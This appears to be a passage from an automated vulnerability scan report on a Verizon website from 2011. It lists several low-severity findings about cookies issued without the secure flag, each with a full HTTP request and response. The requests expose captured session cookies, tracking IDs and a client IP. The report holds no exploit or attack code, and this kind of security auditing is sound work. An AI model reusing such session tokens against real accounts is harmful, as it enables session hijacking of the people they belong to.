ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*

Response

HTTP/1.0 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
Content-Type: text/html; charset=utf-8
Content-Length: 261
Expires: Mon, 05 Sep 2011 22:25:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:33 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; path=/; secure; HttpOnly

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&amp;CUSTTYPE=NEW&amp;
...[SNIP]...

6.45. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/VerizonGlobalHome/validlogin.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/VerizonGlobalHome/validlogin.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 638
Cache-Control: private, max-age=1791
Date: Mon, 05 Sep 2011 22:19:46 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:24:46 GMT; path=/content/; domain=verizon.com

var aType=new Array("retailconsumer","retailgeneralbiz","eservices");var aLOB=new Array("myvz","myvzquickpay","concos","rescos","smbcos","retailgenbiz","retailconsumer","callassistant");var ckType='';
...[SNIP]...

6.46. https://www22.verizon.com/images/body/gradientsectionhdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /images/body/gradientsectionhdr.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/body/gradientsectionhdr.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 294
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/body/gradientsectionhdr.gif
Last-Modified: Thu, 23 Jul 2009 15:51:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:06 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/;httponly

...[SNIP]...

6.47. https://www22.verizon.com/images/headerfooter/bubbletranswhite.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /images/headerfooter/bubbletranswhite.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/bubbletranswhite.png HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 2314
Content-Type: image/png
Content-Location: http://www22.verizon.com/images/headerfooter/bubbletranswhite.png
Last-Modified: Thu, 23 Jul 2009 15:57:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660;path=/;httponly

...[SNIP]...

6.48. https://www22.verizon.com/images/headerfooter/scbsmbbodytile.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /images/headerfooter/scbsmbbodytile.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbbodytile.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 341
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbbodytile.gif
Last-Modified: Sun, 17 Jul 2011 02:18:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/;httponly

...[SNIP]...

6.49. https://www22.verizon.com/images/headerfooter/scbsmbdivider.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /images/headerfooter/scbsmbdivider.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbdivider.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 307
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbdivider.gif
Last-Modified: Sun, 17 Jul 2011 02:18:35 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66645525d5f4f58455e445a4a423660;path=/;httponly

...[SNIP]...

6.50. https://www22.verizon.com/images/headerfooter/scbsmbdividerhoriz.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /images/headerfooter/scbsmbdividerhoriz.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbdividerhoriz.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 389
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbdividerhoriz.gif
Last-Modified: Sun, 17 Jul 2011 02:18:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66645525d5f4f58455e445a4a423660;path=/;httponly

...[SNIP]...

6.51. https://www22.verizon.com/images/headerfooter/scbsmbdividervert.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /images/headerfooter/scbsmbdividervert.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbdividervert.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 381
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbdividervert.gif
Last-Modified: Sun, 17 Jul 2011 02:18:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660;path=/;httponly

...[SNIP]...

6.52. https://www22.verizon.com/images/headerfooter/scbsmbhoriztile.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /images/headerfooter/scbsmbhoriztile.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbhoriztile.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; 